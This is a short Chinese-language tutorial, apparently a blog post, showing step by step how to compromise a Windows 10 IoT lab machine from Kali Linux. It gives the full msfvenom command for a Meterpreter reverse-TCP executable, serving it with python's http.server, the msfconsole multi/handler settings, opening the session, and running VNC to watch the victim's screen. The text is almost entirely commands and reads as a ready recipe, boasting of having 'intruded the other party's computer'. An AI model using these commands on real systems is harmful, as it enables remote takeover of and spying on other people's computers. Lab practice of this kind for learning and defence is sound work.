一、环境
kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3
二、具体步骤
1、管理员权限打开终端
![](https://i-blog.csdnimg.cn/blog_migrate/54f3b7c836e11f9c26705f6c58e0610e.png)
2、生成可执行文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe
![](https://i-blog.csdnimg.cn/blog_migrate/e862849539cdc7fc3ac3888265d3210f.png)
3、在目标靶机下载生成的test.exe程序
1)在kali执行python3 -m http.server
![](https://i-blog.csdnimg.cn/blog_migrate/b56dcd6e7eafe0617b79bdb4953134a2.png)
2)在目标靶机进行下载
![](https://i-blog.csdnimg.cn/blog_migrate/f281c90161a5fae5660304b7dd62bbd6.png)
4、执行msfconsole命令
![](https://i-blog.csdnimg.cn/blog_migrate/7fd72bda998a3383d37084f759c1141a.png)
5、配置参数
use exploit/multi/handler(选择模块)
set payload windows/meterpreter/reverse_tcp(选择攻击模块)
set LhOST 本地ip
set lport 指定端口号
show options(查看配置的参数)
exploit -z -j(后台执行)
6、在靶机运行可执行程序test.exe
![](https://i-blog.csdnimg.cn/blog_migrate/8eb24dc61bb1cb3c956a6d747ec10c94.png)
7、执行sessions查看上钩的用户
![](https://i-blog.csdnimg.cn/blog_migrate/0ac7cff2eb7c2a03326826afcc38360a.png)
8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑
9、运行run vnc -i进行远程监控靶机
![](https://i-blog.csdnimg.cn/blog_migrate/1386ba89b7b55ed8b1bec62ddc08a7ec.png)
![](https://i-blog.csdnimg.cn/blog_migrate/bf8c240c2ac7f2e4070e7ece3e8bbb79.png)